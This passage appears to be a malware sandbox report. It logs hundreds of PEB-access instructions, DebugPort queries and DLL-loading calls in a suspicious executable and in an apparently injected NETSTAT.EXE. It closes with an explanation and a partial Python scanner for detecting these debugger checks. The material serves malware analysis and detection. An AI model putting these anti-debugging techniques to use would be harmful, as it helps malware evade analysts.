          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ABC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ABC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B13540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B2FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B68ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B4FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B4FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03243B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03243B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03244BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03244BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03244BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03221B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03221B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03254A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03254A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03228A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03215210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03215210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03215210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03215210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03233A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0325927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03234120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03234120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03234120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03234120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03234120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03297016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03297016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03297016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03230050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03230050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03293884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03293884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03214F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03214F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03228794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03297794 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032537F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_0321E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032CFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_0321C600 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03248E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032D1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_0324A61C mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_0322766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h] (x6)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032DAE44 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032E0EA5 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032946A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032AFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032276E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032416E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03258EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032436CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032CFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032E8ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_0321AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032DE539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h] (x13)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032E8D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_0329A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03244D3B mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_0323C577 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03253D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03293540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032C3D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03237D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032E05AC mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032435A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03241DB5 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03242581 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_0324FD9B mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_0322D5E0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032DFDE2 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032C8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03296DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_0324BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032E740D mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03296C0A mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h] (x14)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_0323746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_0324A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032AC450 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_0322849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032D14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_03296CF0 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 9_2_032E8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Process queried: DebugPort
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Code function: 1_2_00409B50 LdrLoadDll,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Code function: 0_2_1000EDD1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
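The `mov eax, dword ptr fs:[00000030h]` entries above are loads of the PEB pointer from the TEB, the first step of the classic PEB.BeingDebugged / NtGlobalFlag debugger checks. The following Python is an added example, not part of the Joe Sandbox report: it scans a code buffer for the x86 encodings of that instruction and then looks, within a few bytes, for a read of the byte at PEB+2 (BeingDebugged). The sample bytes and the base address (`HYPOTHETICAL_BASE`) are constructed for illustration and are not taken from the analysed file.

```python
"""Static scan for 32-bit PEB loads ("mov r32, dword ptr fs:[30h]").

Added example, not part of the sandbox report. The sample bytes and base
address below are constructed; they are not from the analysed NETSTAT.EXE.
"""
from __future__ import annotations
import re
import struct

# Under FS on 32-bit Windows (and WOW64) sits the TEB: offset 0x00 is the SEH
# chain head, 0x18 the TEB self-pointer, 0x30 the PEB pointer. PEB+2 is
# BeingDebugged, which is what the follow-up read below looks for.
TEB_FIELDS = {0x00: "TEB.ExceptionList", 0x18: "TEB.Self",
              0x30: "TEB.ProcessEnvironmentBlock"}

# ModRM bytes for "[disp32]" (mod=00, rm=101) with the destination in reg.
MODRM_DISP32 = {0x05: "eax", 0x0D: "ecx", 0x15: "edx", 0x1D: "ebx",
                0x25: "esp", 0x2D: "ebp", 0x35: "esi", 0x3D: "edi"}
# rm field for "[reg+disp8]" addressing (esp needs a SIB byte, so it is left out).
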